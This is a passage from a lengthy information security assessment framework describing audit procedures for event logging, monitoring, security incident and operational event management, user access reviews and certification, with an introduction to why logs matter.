•
Ensure events are logged, investigated, escalated and resolved in accordance with
the Information Security Policies of the enterprise
•
Event Logs include the following at a minimum:
- Security Device Logs (Firewall, IDS, IPS etc)
- Network Device Logs
- Server Logs (Applications, Databases, OS, Email, Web server, Proxy Server,
SMTP Servers)
- Secure Transmission and Storage of Event Logs
•
Ensure that monitoring procedures provide for appropriate escalation procedures
•
Ensure monitoring of logs on daily, weekly or monthly basis as is applicable.
Page 909 of 1123
•
•
•
•
Ensure events are appropriately classified as Security Incidents (Un-authorised
access attempts at server and client levels, IDS event logs of attempted connections)
or Operational Events (Abnormal Information Systems Events such as abnormal
termination, errors, failures, connectivity issues, etc….)
Ensure the process provides for taking necessary actions to prevent recurrence of
security incidents through appropriate measures
Security Incidents are routed to Security Incident Management Process in 6.5.4.3
Operational Events are routed to Operations Events Management Process in 6.5.4.4
11.1.4.1
LOGGING
Logging is one of the most important activities related to the process of monitoring
Information Systems Security within an enterprise. This would involve logging of all the
occurrence of events (whether authorized or unauthorized, normal or abnormal) within
the Information Systems of an enterprise. These event logs would then form the basis
for review and assessment for identification of events that result in a security implication
to the enterprise. The review of a logging must ensure that the following activities are
conducted at a minimum:
•
Review the incident management procedures of the enterprise and ensure that all
technology events are appropriately recorded in a central database either using
automated solutions such as Enterprise Management Systems or through a
helpdesk function.
•
Ensure that the incident management procedures require the central events
database to be reviewed to distinguish normal operational events or potential
security events. Such reviews should ensure normal operational events are routed
to the IT operations staff for resolution, whilst potential security events are routed to
the Chief Information Security Officer and his team for investigation and resolution.
•
Assess whether the process for incident reporting ensures that all system faults or
suspected system faults must be reported and logged.
•
Ensure Helpdesk logs are periodically reviewed to ensure that all faults reported
have been satisfactorily resolved and the Helpdesk call closed.
•
Ensure fault resolutions are reviewed to ensure that Information Security and
Controls have not been compromised in the process of implementing such
resolutions.
•
Review the audit logs have been activated on critical technology components such
as servers, applications, databases and network. Ensure that these logs produce
meaningful information that can be used in investigating security events.
11.1.4.2
MONITORING
Monitoring is the process of continuous review of the event logs of various technology
components of the enterprise. This would involve a review of the audit trails, event logs,
incident logs, helpdesk logs amongst other logs as application to the enterprise.
Depending on the implementation of the logging process (i.e. centralized or
decentralized) this activity can be performed either by one or many individuals across
the enterprise. The most significant component of the process of monitoring is the
responsibility of performance of this activity. The process would necessarily require the
involvement of the Information Security Officer and the Compliance Manager to ensure
that security incidents are identified and appropriate action is initiated to resolve them.
Page 910 of 1123
11.1.4.3
SECURITY INCIDENT MANAGEMENT
The Security Incident Management process would stem from the logging and monitoring
processes mentioned above to ensure that identified security incidents are managed in
accordance with the risks that such incidents pose to the enterprise. The process of
Security Incident Management must be performed by the Information Security Officer
(ISO) and should at a minimum involve the following:
•
Definition of Security events / incidents, this would involve the formalization of a
definitions document that identifies all events / incident types that have a security
implication and considered as critical to the enterprise
•
Allocation of responsibilities for logging of events or incidents reported. This could be
a part of the helpdesk functionality or in larger enterprises, through a security
helpdesk function that is specifically constituted for handling security events or
incidents
•
Constitution of a security response team, this comprises of a team of security
personnel who would respond to the a report of a security event or incident
•
Classification of Security events or incidents, this involves the classification of
security events in order of their impact on the organization
•
Risk Assessment and Incident Response - This is a process of security incident
management wherein the security response team assesses the risks associated with
an identified security incident to the Information Security of the enterprise.
Depending on the criticality of the risk identified, the security and controls to be
implemented are determined. In the event the incident requires further investigation,
processes such as Computer Forensics and Investigations are applied.
11.1.4.4
OPERATION EVENT MANAGEMENT
Operations Event Management relates to the process of responding to events that are
operational in nature. Such events stem from the IT infrastructure and technology being
used in the enterprise and may comprise of routine IT operations events such as
abnormal performance, terminations, poor response amongst many others.
However, it is extremely important that the operations events are also assessed for
security implications so as to ensure that any operations events that may arise from
security violations are identified and remedied in accordance with a response relative to
a security incident. Furthermore, operational event remediation may also at times
introduce security flaws and vulnerabilities which need to be prevented at the time of
remediation itself so as to reduce the probability of such vulnerabilities being exploited
against the security interests of the enterprise.
For evaluation of security implications if any for an operational event, the process of
operations event management must be routed to the Risk Assessment in Security
Incident Management (refer 11.1.4.3 Security Incident Management)
11.1.5
User Access Management
User Access Management relates to the process of managing user access to the
Information Systems of the enterprise. This would include the management of user
access of the following:
•
New User Creation
•
Existing User Access Modifications
•
User Access Profiles creation and modifications
Page 911 of 1123
User Access Termination
A review of the user access management process would essentially comprise of the
following:
•
Review of User Access Policies
•
Review of User Access Management roles and responsibilities
•
Review of User Access creation, modification and termination for the following:
- Business Applications such as ERP
- Enterprise Applications such as Email
- Access to Local Area Network
•
Review of the process for periodic reviews of user access to ensure that transitional
processes of the organization that impact job responsibilities do not result in the
users having unauthorized access
•
Review the process and results of User Access Logs monitoring processes to ensure
that unauthorized activities have been appropriately detected and remedied
•
11.1.6
Certification and Accreditation
Information Systems Security is a rapidly transforming environment wherein new
vulnerabilities and risks are introduced each day resulting in the pressing need for
constant monitoring and assessments to ensure that security management infrastructure
of the enterprise is awake to this challenge and can respond in a manner that
appropriately addresses the technology risks that impact the enterprise.
Given the rapid advancements in technology, enterprises find it difficult to maintain
adequate technological skills or to sustain continuous education to develop the expertise
internally. As a result to maintain its information security capabilities the enterprise often
relies on external parties or dedicated internal groups for the periodic assessment of its
Information Systems Security. Such reviews would typically involve the following:
•
Internal IT Audit Review, comprising of reviews of specific areas of IT security
performed by internal resources
•
Internal Security Assessment, comprising of technology specific reviews performed
by specialist IT security personnel
•
Third party Information Security Assurance Reviews, comprising of security
assessments performed by third party contractors in areas that require advanced
technology and security specializations
Accreditation involves the process of benchmarking and reviewing the IT security
implementation within an enterprise against the ISSAF.
11.2 REVIEW OF LOGGING / MONITORING & AUDITING PROCESSES
11.3 LOGGING
11.3.1
Importance of logging & audit events
Page 912 of 1123
Comment [BR2]: This section is
from issaf0.1 and it’s text needs to be
aligned/merged
11.3.1.1
WHAT ARE LOGS?
Logs are simply data that is recorded during the operation of a program. Logs can
contain usage data, performance data, errors, warnings, and operational information.
Logs can be written to files or databases, either in an easily readable format or in a
proprietary format that must be read using a certain program and can be stored into the
internal machine or a separate machine.
Most server software today includes some logging mechanisms. In Unix Systems you
can enable the syslog.
11.3.1.2
WHY LOGS ARE IMPORTANT?
Logs are often the only way to tell what is happening and happened on in a system. It is
important to identify all programs on all the computers that a business or company
depends on and then gather the available log files for analysis, as deemed necessary
and when required.
Log files are the only way to store the history of what happened within a system. Log
files are often the only way to detect and trace an intrusion by a hacker or someone, so
that we can trace the reason behind a server failure, gather data for capacity planning
for increasing hard drives, or determine which Web pages were visited by the users.
Without logs, it is very difficult (if not impossible) to know what is going on in a system.
Logs can be captured in the same machine and kept or can be stored in a separate
logging machine. Many Workstations, Servers can be allowed to capture in a centralized
(separate) machine.
This can be done either by manually copying the log files to a central machine(s) or by
automating the copying process. From this central machine(s), the log data will be
maintained. If a company wants to log its necessary to do the following:
Working with logs requires you to:
Decide which logs to capture.
Choose an analysis/viewing tool.
Page 913 of 1123
Determine log capture frequency.
Where the logs will be stored (local or remote workstation)
Who will monitor the log and what action will be taken
11.3.1.3
HOW TO APPROACH LOG CAPTURE AND ANALYSIS
Logs can contain huge amounts of data. Logging and analyzing everything can result in
information overload or sometimes slowing down, where either the system or the people
involved cannot handle the amount of data.
As a result, it is important for the System Administrators to decide exactly what
information is required so that only the required data can be logged, captured, and
analyzed. To ensure that needed